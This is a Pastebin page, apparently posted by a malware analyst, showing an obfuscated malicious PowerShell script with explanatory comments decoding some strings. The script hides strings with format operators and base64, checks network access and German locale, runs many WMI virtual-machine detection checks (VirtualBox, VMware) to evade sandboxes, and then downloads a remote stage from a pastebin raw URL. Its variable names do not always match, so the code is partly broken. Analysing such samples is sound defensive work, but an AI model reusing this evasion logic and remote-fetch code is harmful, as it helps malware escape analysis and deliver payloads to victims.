Advertisement
dissectmalware

Malicious Powershell

Dec 18th, 2018
590
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. $webClientObj = New-Object System.Net.WebClient
  2. $cultureInfoObj = Get-Culture | Out-String
  3. $utfEnc = [System.Text.Encoding]::UTF8
  4. $parameter1 = ("{0}{2}{1}"-f'RhZH','g=','UB')   # "{0}{2}{1}"-f'RhZH','g=','UB' -> RhZHUBg= (base64 encoded)
  5. $parameter2 = ("{2}{1}{0}"-f '=','CxY','RBYL')
  6. $parameter3 = ("{2}{0}{1}"-f 'EQB','xE=','SB')
  7. $parameter4 = ("{1}{2}{0}"-f '=','H','0cLUEc')
  8. $parameter5 = ("{0}{1}"-f 'FxEQDB','M=')
  9. ${ilLLLiiiLILililIli} = $utfEnc.GetString([System.Convert]::FromBase64String($parameter2))
  10. ${LlliIiLIlIilLiiIlLL} = $utfEnc.GetString([System.Convert]::FromBase64String($parameter1))
  11. ${iiLIiIliliILlIlLIiiLL} = $utfEnc.GetString([System.Convert]::FromBase64String($parameter3))
  12. ${illlIillIllIIIiIl} = $utfEnc.GetString([System.Convert]::FromBase64String($parameter5))
  13. ${IlllliiIlIliLllIiIiIIl} = $utfEnc.GetString([System.Convert]::FromBase64String($parameter4))
  14. $parameter2Arr = $utfEnc.GetBytes(${illLliIILilILilIli})
  15. ${ilLLIiILiLLiiLLlll} = $utfEnc.GetBytes($parameter1)
  16. ${LlLIIiLiIilllII} = $utfEnc.GetBytes($parameter4)
  17. ${ILLlIIiIlliLlLlIi} = $utfEnc.GetBytes($parameter3)
  18. ${ilIlILLLLiIiiLiIIlLl} = $utfEnc.GetBytes($parameter5)
  19. $jfhArr = $utfEnc.GetBytes("jfh")
  20.  
  21. startTime = (Get-Date).Millisecond
  22.  
  23. IF ($webClientObj.DownloadString(("{6}{3}{0}{4}{1}{2}{5}" -f'tp:','/api.w','ipmani','t','/','a.com','h'))){  # http://api.wipmania.com
  24.     Exit
  25. }
  26.  
  27. $endTime = (Get-Date).Millisecond
  28. $duration = ($endTime - startTime)   # measure how long it takes to get the web page
  29. IF($duration -gt 300){
  30.     Write-Host ("{1}{0}{2}{3}"-f 'ad ','B','t','iming.')   # bad timing
  31. } ELSE {}
  32.  
  33. # Seltsam
  34. $targetCulture = 1961 - 930   # german
  35.  
  36. IF($cultureInfoObj -match $targetCulture){${ililiLilILIIlllILIIiIlIillIILILLlLiI} = $(for (${I}=0; ${i} -lt $parameter2Arr.length;){
  37.     for (${J}=0; ${J} -lt $jfhArr.length; ${J}++) {
  38.         $parameter2Arr[${i}] -bxor $jfhArr[${J}]
  39.         ${I}++
  40.         if (${i} -ge $parameter2Arr.length) {
  41.             ${j} = $jfhArr.length
  42.         }
  43.     }
  44. })} ELSE {${ILILILIlILiiLLlILiIIilIILliiLiLLLlII} = $(for (${i}=0; ${I} -lt ${LLLiiILIiiLllII}.length;){
  45.     for (${j}=0; ${j} -lt $jfhArr.length; ${J}++) {
  46.         ${LlliiiLIIILLlII}[${i}] -bxor $jfhArr[${j}]
  47.         ${I}++
  48.         if (${i} -ge ${llliIiliiILLlIi}.length) {
  49.             ${j} = $jfhArr.length
  50.         }
  51.     }
  52. })}
  53.  
  54.  # VmJveHxWaXJ0dWFsfFZNd2FyZXxWTSB3YXJl  -> Vbox|Virtual|VMware|VM ware
  55. $vmSigns = ("{0}{3}{6}{4}{9}{7}{1}{8}{10}{5}{2}"-f'VmJveH','Nd2F','3YXJl','xWa','dWF','TSB','XJ0','FZ','yZX','sf','xW')  
  56.  
  57.  
  58. # select * from win32_pingstatus where address = '8.8.8.8'
  59. if (gwmi -query ((("{8}{0}{9}{7}{16}{6}{2}{10}{12}{11}{3}{5}{17}{1}{14}{13}{15}{4}" -f'elect','where ad','win','gstat','8EDz','us','om ','*','s',' ','3','in','2_p',' EDz','dress =','8.8.8.',' fr',' ')).replaCe('EDz',[STRing][CHAR]39))){Exit}
  60.  
  61. # vm detection
  62. IF(((gwmi win32_baseboard).Product) -match [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($vmSigns))){
  63.     ${IllLIIIlILIlililiLiLIiIillLLlIilIllL} = ((("{7}{10}{8}{0}{3}{11}{1}{2}{4}{6}{5}{9}" -f '6','b26x','00b26x14','x00b2','b26','x00b26x','x00b26','b2','b2','00','6x00','6x00')) -REplACe'b26',[CHar]92)
  64.     Write-Host ${ILLLIiILIlILilIlILiLIiiILLlLLiiLiLll}
  65. } ELSEIF((gwmi win32_pnpentity) -match [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($vmSigns))){
  66.     ${IlIliliLIlIiLLLIliIiiLIILLiIliLLllII} = ((("{10}{2}{9}{7}{0}{3}{8}{4}{1}{5}{6}" -f 'r8x1a','x','00v','v','05vr8','10v','r8x04','8x00v','r8x00vr8x','r','vr8x')).rEPLACE('vr8','\'))
  67.     Write-Host ${IlllIlIIiIlLllLIililLLlIiILILIliLiLi}
  68. } ELSEIF(((gwmi win32_computersystem).Model) -match [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($vmSigns))){
  69.     ${illLIiilILiLililIliLIiiILLLLlIilIllL} = ((("{5}{3}{4}{2}{1}{6}{0}"-f '00cAMx01','cAM','Mx00','AMx01','cAMx00cA','c','x')).RepLAcE('cAM','\'))
  70.     Write-Host ${illLiIiLililiLiLIlILIIiIlLlLliIlillL}
  71. } ELSEIF(((gwmi win32_diskdrive).Model) -match [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($vmSigns))){
  72.     ${ILlLILIIiilLLllIIliLLLlIiILiliLiLIli} = ((("{3}{4}{5}{0}{2}{1}{6}" -f '01P9qx01P','P','9qx00','P','9qx0','1P9qxdaP9qx','9qx03'))  -RePlaCe ([CHaR]80+[CHaR]57+[CHaR]113),[CHaR]92)
  73.     Write-Host ${IlLliLiiIilllLLiILILLLliIILIlILILIlI}
  74. } ELSEIF(((gwmi win32_logicaldisk).VolumeName) -match [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($vmSigns))){
  75.     ${iliLilIlIlIiLLliliIiiLIIllIilillllII} = ((("{5}{4}{2}{0}{1}{3}"-f'0{0}x00{0}x00{0}','x0','0}x0','1','{','{0}x01'))  -f [CHAR]92)
  76.     Write-Host ${IlLLIIIlILiLilIlilILiIIiLLLlLIiLiLLl}
  77. } ELSEIF(((gwmi win32_bios).Version) -match [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($vmSigns))){
  78.     ${ilLLILiiIiLlllliILiLLLliiIlIlIlIlili} = ((("{0}{5}{2}{6}{1}{4}{3}"-f'{0}x','0','1{','{0}x03','}x00','0','0}xda{0}x01{0}x01{'))-f  [cHar]92)
  79.     Write-Host ${illLiLIIIilLLLLIilILLLLIiILiLilililI}
  80. } ELSEIF(((gwmi win32_bios).SerialNumber) -eq "0"){
  81.     ${IlLlilIIiILLlLLIiLILlLLIIiliLIlILilI} = ((("{8}{7}{0}{3}{2}{5}{9}{6}{1}{4}" -f'YGxda','x','8YGx018Y','8YGx01','03','Gx0','YG','18','8YGx0','08')) -rePLACe  '8YG',[chaR]92)
  82.     Write-Host ${ilLlIlIiIILLllLIilillLliiiLILilIlIli}
  83. } ELSEIF(((gwmi win32_bios).SMBIOSBIOSVersion) -match [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($vmSigns))){
  84.     ${IllliiilIlililILiLiliiiILLllliiLilLl} = ((("{7}{0}{1}{3}{4}{6}{5}{8}{2}"-f'00ZRC','x00ZRCx00','0','ZRCx00','ZRC','4ZRCx00ZRCx00Z','x1','ZRCx','RCx0')).RePlaCE('ZRC',[StrInG][chAR]92))
  85.     Write-Host ${IlLLiiILILiLILiliLILiiiILllLLiiLIlll}
  86. } ELSEIF((gwmi win32_systemdriver) -match [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($vmSigns))){
  87.     ${IlllIiiLIlilIlilililIiiIlLLlliIlIlLL} = ((("{7}{5}{3}{2}{4}{1}{0}{6}"-f 'x000zB','B','010zBx000zBx','x','000z','zB','x01','0'))-CrePLACe  ([cHar]48+[cHar]122+[cHar]66),[cHar]92)
  88.     Write-Host ${ILLlIIiliLILILIlILIlIIiiLllllIiLiLLL}
  89. } ELSEIF((gwmi win32_service) -match [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($vmSigns))){
  90.     ${ILIlIlILiLiILLLILIiIilIIlLIiliLlLLIi} = ((("{7}{0}{4}{5}{10}{2}{8}{6}{3}{9}{1}"-f '}x00','04','0','x05{0}x10{0}','{0}x00{0','}x','0}','{0','}x00{','x','1a{'))-F[chAR]92)
  91.     Write-Host ${ILlliLiIIILlllliiLIlLlLiIIlilililILI}
  92. } ELSE {
  93.  
  94.     #https://pastebin.com/raw/VbTHMA0T   --> D4 C3 B2 A1 02 00
  95.     ${IlLLiIiLILIlIliLIlILiiiiLLlLlIiLilll} = $webClientObj.DownloadString(("{5}{1}{2}{3}{0}{4}" -f 'w/VbTHMA','tps://pastebi','n.com/','ra','0T','ht'))
  96.     ${ILLlILIiiIllllliILILLlliiiliLiLilILI} = ("[REDACTED]")
  97.     ${iLLliiLI} = ${iLlLiiiLIlIlIliLiliLIIIIlllLLIiLilLl} + ${ILllIlIIIIlLlllIiLILllLiiIlILIlIlilI} + ${IliLiLILiliiLlliLiiiiLiIllIIlIllLLIi}
  98. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement